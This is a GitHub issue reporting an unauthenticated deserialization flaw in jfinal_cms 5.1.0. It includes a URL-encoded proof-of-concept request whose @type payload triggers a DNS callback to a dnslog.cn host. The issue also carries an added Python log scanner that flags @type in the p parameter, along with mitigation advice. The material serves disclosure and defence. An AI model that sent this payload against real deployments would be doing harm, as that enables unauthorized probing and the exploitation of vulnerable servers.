jflyfox / jfinal_cms

jfinal cms is a full-featured information portal developed in Java. It uses the concise and powerful JFinal as the web framework, beetl as the template engine, MySQL as the database and Bootstrap on the front end. It supports OAuth2 authentication, account registration, password encryption, comments and replies, message notifications, site visit statistics, per-article comment and view counts, reply management, and permission management. The back-end modules include: column management, column announcements, column carousel images, article management, reply management, feedback, my albums, album management, image management, collection management, video management, cache refresh, friendly links, visit statistics, contact management, template management, organization management, user management, role management, menu management, and data dictionary management.
http://mtg.jflyfox.com/
Apache License 2.0
628 stars 285 forks

jfinal CMS v5.1.0 has an unauthorized command execution vulnerability #60

Open kaoniniang2 opened 4 weeks ago

kaoniniang2 commented 4 weeks ago

jfinal_cms version: 5.1.0; JDK version: jdk-8u351

Vulnerable file: ApiForm.java

The p parameter is passed in from the outside through the interface, and because its contents can be controlled, this results in serialization.

POC: p parameter content (URL encoding is required): {"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}

GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d
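Added example, not part of the issue report or of the jfinal_cms code base: a defender-side check that takes a web-server request line, URL-decodes the p query parameter and flags any `@type` key inside it. `@type` is the class-selection marker of JSON libraries with an autotype feature, and its presence in a parameter that a handler deserializes is what the report above relies on. The two log lines are constructed for this example: the first carries exactly the request from the report, the second is a benign call to the same endpoint. The log format (request line only) is an assumption; adapt `decode_p` to whatever your access log records.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log request lines (assumed format: method, path, version).
# Line 0 is the request from the issue report; line 1 is a constructed benign call.
SAMPLE_LOG = [
    "GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1"
    "&method=pageArticleSite&time=20170314160401"
    "&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74"
    "%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72"
    "%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d HTTP/1.1",
    "GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1"
    "&method=pageArticleSite&time=20170314160401&p=%7b%22siteId%22%3a1%7d HTTP/1.1",
]


def decode_p(request_line):
    """Return the URL-decoded value of the p query parameter, or None if absent."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query).get("p")  # parse_qs percent-decodes the value
    return values[0] if values else None


def find_type_keys(node, found=None):
    """Recursively collect the value of every '@type' key in a parsed JSON tree."""
    if found is None:
        found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                found.append(value)
            find_type_keys(value, found)
    elif isinstance(node, list):
        for item in node:
            find_type_keys(item, found)
    return found


def scan(request_line):
    """Class names selected via '@type' in the p parameter; empty list when clean."""
    raw = decode_p(request_line)
    if raw is None:
        return []
    try:
        tree = json.loads(raw)
    except ValueError:
        # Not valid JSON: a parser may still accept it, so fall back to a substring check
        return ["<unparsed @type>"] if "@type" in raw else []
    return find_type_keys(tree)


def scan_log(lines):
    """(line index, flagged class names) for every request whose p carries '@type'."""
    hits = []
    for index, line in enumerate(lines):
        types = scan(line)
        if types:
            hits.append((index, types))
    return hits


if __name__ == "__main__":
    for index, types in scan_log(SAMPLE_LOG):
        print(f"line {index}: p selects classes {types}")
```

Running the block reports only line 0, with `java.net.Inet4Address` as the selected class. The check is useful for triage of existing logs and for a WAF-style rule, but it is not the fix: the durable mitigation is for the handler behind `/api/action` to stop deserializing `p` with class selection enabled, i.e. bind it to a fixed application type with autotype disabled, so that a client-supplied `@type` is never honoured.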

ElevenKong commented 4 weeks ago

Hello, I have received your message! Thank you! Best Wishes! ——孔祥亮